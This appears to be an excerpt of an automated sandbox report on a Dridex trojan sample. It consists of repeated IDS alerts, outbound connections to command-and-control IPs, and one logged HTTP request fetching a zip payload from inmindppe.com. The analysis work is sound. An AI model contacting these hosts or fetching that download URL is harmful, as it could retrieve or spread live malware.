Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49260
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49261
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49263
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49264
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49265
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49265
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49267
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49268
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49269
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49269
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49271
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49272
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49273
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49273
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49275
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49276
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49277
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49277
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49279
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49280
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49281
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49281
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49283
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49284
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49285
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49285
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49287
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49288
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49289
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49291
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49292
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49293
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49293
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49295
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49296
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49297
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49299
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49300
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49301
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49301
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49303
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49304
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49305
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49305
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49307
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49308
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49309
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49309
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49311
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49312
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49313
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49315
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49316
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49317
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49317
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49319
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49320
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49321
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49321
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49323
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49324
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49325
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49325
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49327
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49328
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49329
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49329
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49331
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49332
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49333
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49333
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49335
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49336
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49337
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49337
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49339
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49340
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49341
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49341
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49343
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49344
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49345
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49345
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49347
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49348
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49349
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49349
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49351
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49352
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49353
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49353
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49355
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49356
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49357
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49357
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49359
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49360
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49361
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49361
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49363
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49364
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49365
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49365
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49367
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49368
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49369
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49369
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49371
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49372
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49373
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49373
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49375
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49376
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49377
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49377
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49379
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49380
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49381
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49381
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49383
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49384
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49385
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49385
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49387
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49388
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49389
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49389
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49391
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49392
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49393
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49393
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49395
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49396
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49397
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49397
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49399
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49400
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49401
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49401
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49403
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49404
Source: Traffic	Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49405
Source: Traffic	Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49405

Source: global traffic	TCP traffic: 192.168.2.22:49170 -> 80.86.91.27:3308
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 5.100.228.233:3389
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 46.105.131.65:1512

Source: Joe Sandbox View

IP Address: 77.220.64.37 77.220.64.37

Source: Joe Sandbox View	ASN Name: SENTIANL SENTIANL
Source: Joe Sandbox View	ASN Name: GD-EMEA-DC-SXB1DE GD-EMEA-DC-SXB1DE

Source: Joe Sandbox View

JA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87

Source: global traffic

HTTP traffic detected: GET /eb3kd1le.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: inmindppe.comConnection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 80.86.91.27
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 5.100.228.233
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 46.105.131.65
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37
Source: unknown	TCP traffic detected without corresponding DNS query: 77.220.64.37

Source: C:\Windows\SysWOW64\regsvr32.exe

